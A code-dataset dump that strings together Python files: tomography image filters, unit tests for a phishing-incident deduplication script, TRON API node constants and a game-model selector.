elif int_mode.lower() == 'reflect':
int_mode = 1
else:
raise ValueError("int_mode should be WRAP or REFLECT")
if not 0 <= theta_min < 180:
raise ValueError("theta_min should be in the range [0 - 180)")
args = (center_x, center_y, dx, dy, dz, thresh_max, thresh_min, thresh,
theta_min, rwidth, int_mode)
axis_size = rec.shape[0]
ncore, nchunk = mproc.get_ncore_nchunk(axis_size, ncore, nchunk)
with cf.ThreadPoolExecutor(ncore) as e:
for offset in range(0, axis_size, nchunk):
slc = np.s_[offset:offset + nchunk]
e.submit(extern.c_remove_ring, out[slc], *args)
return out
def circ_mask(arr, axis, ratio=1, val=0., ncore=None):
"""
Apply circular mask to a 3D array.
Parameters
----------
arr : ndarray
Arbitrary 3D array.
axis : int
Axis along which mask will be performed.
ratio : int, optional
Ratio of the mask's diameter in pixels to
the smallest edge size along given axis.
val : int, optional
Value for the masked region.
Returns
-------
ndarray
Masked array.
"""
arr = dtype.as_float32(arr)
val = np.float32(val)
_arr = arr.swapaxes(0, axis)
dx, dy, dz = _arr.shape
mask = _get_mask(dy, dz, ratio)
with mproc.set_numexpr_threads(ncore):
ne.evaluate('where(mask, _arr, val)', out=_arr)
return _arr.swapaxes(0, axis)
def _get_mask(dx, dy, ratio):
"""
Calculate 2D boolean circular mask.
Parameters
----------
dx, dy : int
Dimensions of the 2D mask.
ratio : int
Ratio of the circle's diameter in pixels to
the smallest mask dimension.
Returns
-------
ndarray
2D boolean array.
"""
rad1 = dx / 2.
rad2 = dy / 2.
if dx < dy:
r2 = rad1 * rad1
else:
r2 = rad2 * rad2
y, x = np.ogrid[0.5 - rad1:0.5 + rad1, 0.5 - rad2:0.5 + rad2]
return x * x + y * y < ratio * ratio * r2
def enhance_projs_aps_1id(imgstack, median_ks=5, ncore=None):
"""
Enhance the projection images with weak contrast collected at APS 1ID
This filter uses a median fileter (will be switched to enhanced recursive
median fileter, ERMF, in the future) for denoising, and a histogram
equalization for dynamic range adjustment to bring out the details.
Parameters
----------
imgstack : np.ndarray
tomopy images stacks (axis_0 is the oemga direction)
median_ks : int, optional
2D median filter kernel size for local noise suppresion
ncore : int, optional
number of cores used for speed up
Returns
-------
ndarray
3D enhanced image stacks.
"""
ncore = mproc.mp.cpu_count() - 1 if ncore is None else ncore
# need to use multiprocessing to speed up the process
tmp = []
with cf.ProcessPoolExecutor(ncore) as e:
for n_img in range(imgstack.shape[0]):
tmp.append(
e.submit(
_enhance_img,
imgstack[n_img, :, :],
median_ks,
))
return np.stack([me.result() for me in tmp], axis=0)
def _enhance_img(img, median_ks, normalized=True):
"""
Enhance the projection image from aps 1ID to counter its weak contrast
nature
Parameters
----------
img : ndarray
original projection image collected at APS 1ID
median_ks: int
kernel size of the 2D median filter, must be odd
normalized: bool, optional
specify whether the enhanced image is normalized between 0 and 1,
default is True
Returns
-------
ndarray
enhanced projection image
"""
wgt = _calc_histequal_wgt(img)
img = medfilt2d(img, kernel_size=median_ks).astype(np.float64)
img = ne.evaluate('(img**2)*wgt', out=img)
return img / img.max() if normalized else img
def _calc_histequal_wgt(img):
"""
Calculate the histogram equalization weight for a given image
Parameters
----------
img : ndarray
2D images
Returns
-------
ndarray
histogram euqalization weights (0-1) in the same shape as original
image
"""
return (np.sort(img.flatten()).searchsorted(img) + 1) / np.prod(img.shape)
| 30.649061
| 79
| 0.582354
|
s.sobel, arr[slc], output=out[slc])
return out
def remove_nan(arr, val=0., ncore=None):
arr = dtype.as_float32(arr)
val = np.float32(val)
with mproc.set_numexpr_threads(ncore):
ne.evaluate('where(arr!=arr, val, arr)', out=arr)
return arr
def remove_neg(arr, val=0., ncore=None):
arr = dtype.as_float32(arr)
val = np.float32(val)
with mproc.set_numexpr_threads(ncore):
ne.evaluate('where(arr<0, val, arr)', out=arr)
return arr
def remove_outlier(arr, dif, size=3, axis=0, ncore=None, out=None):
tmp = np.empty_like(arr)
ncore, chnk_slices = mproc.get_ncore_slices(arr.shape[axis], ncore=ncore)
filt_size = [size] * arr.ndim
filt_size[axis] = 1
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(ncore):
slc[axis] = chnk_slices[i]
e.submit(filters.median_filter,
arr[tuple(slc)],
size=filt_size,
output=tmp[tuple(slc)])
arr = dtype.as_float32(arr)
tmp = dtype.as_float32(tmp)
dif = np.float32(dif)
with mproc.set_numexpr_threads(ncore):
out = ne.evaluate('where(arr-tmp>=dif,tmp,arr)', out=out)
return out
def remove_outlier1d(arr, dif, size=3, axis=0, ncore=None, out=None):
arr = dtype.as_float32(arr)
dif = np.float32(dif)
tmp = np.empty_like(arr)
other_axes = [i for i in range(arr.ndim) if i != axis]
largest = np.argmax([arr.shape[i] for i in other_axes])
lar_axis = other_axes[largest]
ncore, chnk_slices = mproc.get_ncore_slices(arr.shape[lar_axis],
ncore=ncore)
filt_size = [1] * arr.ndim
filt_size[axis] = size
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(ncore):
slc[lar_axis] = chnk_slices[i]
e.submit(filters.median_filter,
arr[slc],
size=filt_size,
output=tmp[slc],
mode='mirror')
with mproc.set_numexpr_threads(ncore):
out = ne.evaluate('where(arr-tmp>=dif,tmp,arr)', out=out)
return out
def remove_outlier_cuda(arr, dif, size=3, axis=0):
arr = dtype.as_float32(arr)
dif = np.float32(dif)
try:
import tomocuda
winAllow = range(2, 16)
if (axis != 0):
arr = np.swapaxes(arr, 0, axis)
if size in winAllow:
prjsize = arr.shape[0]
loffset = int(size / 2)
roffset = int((size - 1) / 2)
imsizex = arr.shape[2]
imsizey = arr.shape[1]
filter = tomocuda.mFilter(imsizex, imsizey, prjsize, size)
out = np.zeros(shape=(prjsize, imsizey, imsizex), dtype=np.float32)
for step in range(prjsize):
im_noisecu = arr[step].astype(np.float32)
im_noisecu = np.lib.pad(im_noisecu, ((loffset, roffset),
(loffset, roffset)),
'symmetric')
im_noisecu = im_noisecu.flatten()
filter.setCuImage(im_noisecu)
filter.run2DRemoveOutliner(size, dif)
results = filter.retreive()
results = results.reshape(imsizey, imsizex)
out[step] = results
if (axis != 0):
out = np.swapaxes(out, 0, axis)
else:
warnings.warn("Window size not support, using cpu outlier removal")
out = remove_outlier(arr, dif, size)
except ImportError:
warnings.warn("The tomocuda is not support, using cpu outlier removal")
out = remove_outlier(arr, dif, size)
return out
def remove_ring(rec,
center_x=None,
center_y=None,
thresh=300.0,
thresh_max=300.0,
thresh_min=-100.0,
theta_min=30,
rwidth=30,
int_mode='WRAP',
ncore=None,
nchunk=None,
out=None):
rec = dtype.as_float32(rec)
if out is None:
out = rec.copy()
else:
out = dtype.as_float32(out)
dz, dy, dx = rec.shape
if center_x is None:
center_x = (dx - 1.0) / 2.0
if center_y is None:
center_y = (dy - 1.0) / 2.0
if int_mode.lower() == 'wrap':
int_mode = 0
elif int_mode.lower() == 'reflect':
int_mode = 1
else:
raise ValueError("int_mode should be WRAP or REFLECT")
if not 0 <= theta_min < 180:
raise ValueError("theta_min should be in the range [0 - 180)")
args = (center_x, center_y, dx, dy, dz, thresh_max, thresh_min, thresh,
theta_min, rwidth, int_mode)
axis_size = rec.shape[0]
ncore, nchunk = mproc.get_ncore_nchunk(axis_size, ncore, nchunk)
with cf.ThreadPoolExecutor(ncore) as e:
for offset in range(0, axis_size, nchunk):
slc = np.s_[offset:offset + nchunk]
e.submit(extern.c_remove_ring, out[slc], *args)
return out
def circ_mask(arr, axis, ratio=1, val=0., ncore=None):
arr = dtype.as_float32(arr)
val = np.float32(val)
_arr = arr.swapaxes(0, axis)
dx, dy, dz = _arr.shape
mask = _get_mask(dy, dz, ratio)
with mproc.set_numexpr_threads(ncore):
ne.evaluate('where(mask, _arr, val)', out=_arr)
return _arr.swapaxes(0, axis)
def _get_mask(dx, dy, ratio):
rad1 = dx / 2.
rad2 = dy / 2.
if dx < dy:
r2 = rad1 * rad1
else:
r2 = rad2 * rad2
y, x = np.ogrid[0.5 - rad1:0.5 + rad1, 0.5 - rad2:0.5 + rad2]
return x * x + y * y < ratio * ratio * r2
def enhance_projs_aps_1id(imgstack, median_ks=5, ncore=None):
ncore = mproc.mp.cpu_count() - 1 if ncore is None else ncore
tmp = []
with cf.ProcessPoolExecutor(ncore) as e:
for n_img in range(imgstack.shape[0]):
tmp.append(
e.submit(
_enhance_img,
imgstack[n_img, :, :],
median_ks,
))
return np.stack([me.result() for me in tmp], axis=0)
def _enhance_img(img, median_ks, normalized=True):
wgt = _calc_histequal_wgt(img)
img = medfilt2d(img, kernel_size=median_ks).astype(np.float64)
img = ne.evaluate('(img**2)*wgt', out=img)
return img / img.max() if normalized else img
def _calc_histequal_wgt(img):
return (np.sort(img.flatten()).searchsorted(img) + 1) / np.prod(img.shape)
| true
| true
|
1c3eaf4d4b2cd9a62fb998a099bf380bf5054503
| 10,095
|
py
|
Python
|
Packs/Phishing/Scripts/PhishingDedupPreprocessingRule/PhishingDedupPreprocessingRule_test.py
|
sandeepklog/content
|
00e67220bf2842ff3931f8493b2b097f07aebcf4
|
[
"MIT"
] | null | null | null |
Packs/Phishing/Scripts/PhishingDedupPreprocessingRule/PhishingDedupPreprocessingRule_test.py
|
sandeepklog/content
|
00e67220bf2842ff3931f8493b2b097f07aebcf4
|
[
"MIT"
] | 2
|
2019-09-18T08:11:22.000Z
|
2020-11-24T18:50:28.000Z
|
Packs/Phishing/Scripts/PhishingDedupPreprocessingRule/PhishingDedupPreprocessingRule_test.py
|
sandeepklog/content
|
00e67220bf2842ff3931f8493b2b097f07aebcf4
|
[
"MIT"
] | 2
|
2020-10-11T18:01:32.000Z
|
2020-10-14T03:21:23.000Z
|
from CommonServerPython import *
from PhishingDedupPreprocessingRule import *
import json
ID_CONtER = 0
EXISTING_INCIDENTS = []
RESULTS = None
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
IDS_COUNTER = 0
text = "Imagine there's no countries It isn't hard to do Nothing to kill or die for And no religion too " \
"Imagine all the people Living life in peace"
text2 = "Love of my life, you've hurt me You've broken my heart and now you leave me Love of my life, can't you see?\
Bring it back, bring it back Don't take it away from me, because you don't know What it means to me"
def create_incident(subject=None, body=None, html=None, emailfrom=None):
global IDS_COUNTER
incident = {
"CustomFields": {},
"id": str(IDS_COUNTER),
"name": ' '.join(str(x) for x in [subject, body, html, emailfrom, id])
}
IDS_COUNTER += 1
if subject is not None:
incident['CustomFields']['emailsubject'] = subject
if body is not None:
incident['CustomFields']['emailbody'] = body
if html is not None:
incident['CustomFields']['emailbodyhtml'] = html
if emailfrom is not None:
incident['CustomFields']['emailfrom'] = emailfrom
return incident
def set_existing_incidents_list(incidents_list):
global EXISTING_INCIDENTS
EXISTING_INCIDENTS = incidents_list
def executeCommand(command, args=None):
global EXISTING_INCIDENTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
if command == 'GetIncidentsByQuery':
incidents_str = json.dumps(EXISTING_INCIDENTS)
return [{'Contents': incidents_str, 'Type': 'not error'}]
if command == 'linkIncidents':
EXISTING_INCIDENT_ID = args['incidentId']
DUP_INCIDENT_ID = args['linkedIncidentIDs']
def results(arg):
global RESULTS
RESULTS = arg
def duplicated_incidents_found(existing_incident):
return existing_incident['id'] == EXISTING_INCIDENT_ID
def test_same_incidents_text_only(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'TextOnly'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_different_text_only(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
text = "Imagine there's no countries It isn't hard to do Nothing to kill or die for And no religion too " \
"Imagine all the people Living life in peace"
existing_incident = create_incident(body=text2, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'TextOnly'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_same_incidents_exact_sender_match_same_senders(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Exact'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_same_incidents_exact_sender_match_different_senders(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
text = "Imagine there's no countries It isn't hard to do Nothing to kill or die for And no religion too " \
"Imagine all the people Living life in peace"
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Exact'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_same_incidents_exact_sender_match_same_senders_different_texts(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Exact'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text2, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_same_incidents_domain_sender_match_same_senders(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_same_incidents_domain_sender_match_same_domain(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_same_incidents_domain_sender_match_same_domain_different_texts(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text2, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_slightly_different_texts(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'TextOnly'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text[:-5], emailfrom='mt.kb.user@gmail.co')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_html_text(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID, text, text2
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
html = '<!DOCTYPE html>\
<html>\
<body>\
<h1>{}</h1>\
<p>{}</p>\
</body>\
</html>\
'.format(text, text2)
clean_text = '{}\n{}'.format(text, text2)
existing_incident = create_incident(body=clean_text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(html=html, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
| 46.520737
| 117
| 0.750173
|
from CommonServerPython import *
from PhishingDedupPreprocessingRule import *
import json
ID_CONtER = 0
EXISTING_INCIDENTS = []
RESULTS = None
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
IDS_COUNTER = 0
text = "Imagine there's no countries It isn't hard to do Nothing to kill or die for And no religion too " \
"Imagine all the people Living life in peace"
text2 = "Love of my life, you've hurt me You've broken my heart and now you leave me Love of my life, can't you see?\
Bring it back, bring it back Don't take it away from me, because you don't know What it means to me"
def create_incident(subject=None, body=None, html=None, emailfrom=None):
global IDS_COUNTER
incident = {
"CustomFields": {},
"id": str(IDS_COUNTER),
"name": ' '.join(str(x) for x in [subject, body, html, emailfrom, id])
}
IDS_COUNTER += 1
if subject is not None:
incident['CustomFields']['emailsubject'] = subject
if body is not None:
incident['CustomFields']['emailbody'] = body
if html is not None:
incident['CustomFields']['emailbodyhtml'] = html
if emailfrom is not None:
incident['CustomFields']['emailfrom'] = emailfrom
return incident
def set_existing_incidents_list(incidents_list):
global EXISTING_INCIDENTS
EXISTING_INCIDENTS = incidents_list
def executeCommand(command, args=None):
global EXISTING_INCIDENTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
if command == 'GetIncidentsByQuery':
incidents_str = json.dumps(EXISTING_INCIDENTS)
return [{'Contents': incidents_str, 'Type': 'not error'}]
if command == 'linkIncidents':
EXISTING_INCIDENT_ID = args['incidentId']
DUP_INCIDENT_ID = args['linkedIncidentIDs']
def results(arg):
global RESULTS
RESULTS = arg
def duplicated_incidents_found(existing_incident):
return existing_incident['id'] == EXISTING_INCIDENT_ID
def test_same_incidents_text_only(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'TextOnly'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_different_text_only(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
text = "Imagine there's no countries It isn't hard to do Nothing to kill or die for And no religion too " \
"Imagine all the people Living life in peace"
existing_incident = create_incident(body=text2, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'TextOnly'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_same_incidents_exact_sender_match_same_senders(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Exact'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_same_incidents_exact_sender_match_different_senders(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
text = "Imagine there's no countries It isn't hard to do Nothing to kill or die for And no religion too " \
"Imagine all the people Living life in peace"
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Exact'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_same_incidents_exact_sender_match_same_senders_different_texts(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Exact'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text2, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_same_incidents_domain_sender_match_same_senders(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_same_incidents_domain_sender_match_same_domain(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_same_incidents_domain_sender_match_same_domain_different_texts(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text2, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_slightly_different_texts(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'TextOnly'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text[:-5], emailfrom='mt.kb.user@gmail.co')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_html_text(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID, text, text2
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
html = '<!DOCTYPE html>\
<html>\
<body>\
<h1>{}</h1>\
<p>{}</p>\
</body>\
</html>\
'.format(text, text2)
clean_text = '{}\n{}'.format(text, text2)
existing_incident = create_incident(body=clean_text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(html=html, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
| true
| true
|
1c3eafa1dc15b9815c461f8e4e81effe44ea1d93
| 582
|
py
|
Python
|
tronapi/constants.py
|
oushu1zhangxiangxuan1/tron-api-python
|
d93959e758fb967584ad36372e29ab67eaa6dc79
|
[
"MIT"
] | 111
|
2018-10-15T19:49:31.000Z
|
2022-03-26T02:48:37.000Z
|
tronapi/constants.py
|
oushu1zhangxiangxuan1/tron-api-python
|
d93959e758fb967584ad36372e29ab67eaa6dc79
|
[
"MIT"
] | 83
|
2018-10-24T18:49:56.000Z
|
2022-03-02T21:36:21.000Z
|
tronapi/constants.py
|
oushu1zhangxiangxuan1/tron-api-python
|
d93959e758fb967584ad36372e29ab67eaa6dc79
|
[
"MIT"
] | 78
|
2018-10-16T06:29:10.000Z
|
2022-03-18T04:39:53.000Z
|
# --------------------------------------------------------------------
# Copyright (c) iEXBase. All rights reserved.
# Licensed under the MIT License.
# See License.txt in the project root for license information.
# --------------------------------------------------------------------
# Here we specify default values for the different needed urls.
# They are verified. Don't change this unless you know what you're doing.
DEFAULT_NODES = {
'full_node': 'https://api.trongrid.io',
'solidity_node': 'https://api.trongrid.io',
'event_server': 'https://api.trongrid.io'
}
| 41.571429
| 73
| 0.546392
|
DEFAULT_NODES = {
'full_node': 'https://api.trongrid.io',
'solidity_node': 'https://api.trongrid.io',
'event_server': 'https://api.trongrid.io'
}
| true
| true
|
1c3eb035ee715827be07854c75e698fafd898d35
| 3,278
|
py
|
Python
|
model/model_api.py
|
thukg/KG-concept-game
|
daedea0f9109012a079833de034766ad23c731b6
|
[
"MIT"
] | 1
|
2019-09-27T11:05:17.000Z
|
2019-09-27T11:05:17.000Z
|
model/model_api.py
|
thukg/KG-concept-game
|
daedea0f9109012a079833de034766ad23c731b6
|
[
"MIT"
] | null | null | null |
model/model_api.py
|
thukg/KG-concept-game
|
daedea0f9109012a079833de034766ad23c731b6
|
[
"MIT"
] | null | null | null |
from model.random_model import RandomModel
from model.greedy_model import GreedyModel
from model.min_max_model import MinMaxModel
from model.alpha_beta_model import AlphaBetaModel
from model.sprague_grundy_model import SpragueGrundyModel
from model.fully_connected_network_model import FCNModel
import config
def name_to_model(s, env):
s = s.lower()
assert s in config.model_list
model = None
if s == 'random':
model = RandomModel(env)
if s == 'greedy-p0':
model = GreedyModel(env, 0)
if s == 'greedy-p1':
model = GreedyModel(env, 1)
if s == 'greedy-p2':
model = GreedyModel(env, 2)
if s == 'minmax-p0':
model = MinMaxModel(env, 0)
if s == 'minmax-p1':
model = MinMaxModel(env, 1)
if s == 'minmax-p2':
model = MinMaxModel(env, 2)
if s == 'ab-p0':
model = AlphaBetaModel(env, 0)
if s == 'ab-p1':
model = AlphaBetaModel(env, 1)
if s == 'ab-p2':
model = AlphaBetaModel(env, 2)
if s == 'sg':
model = SpragueGrundyModel(env)
if s == 'fcn':
model = FCNModel(env)
model.name = s
return model
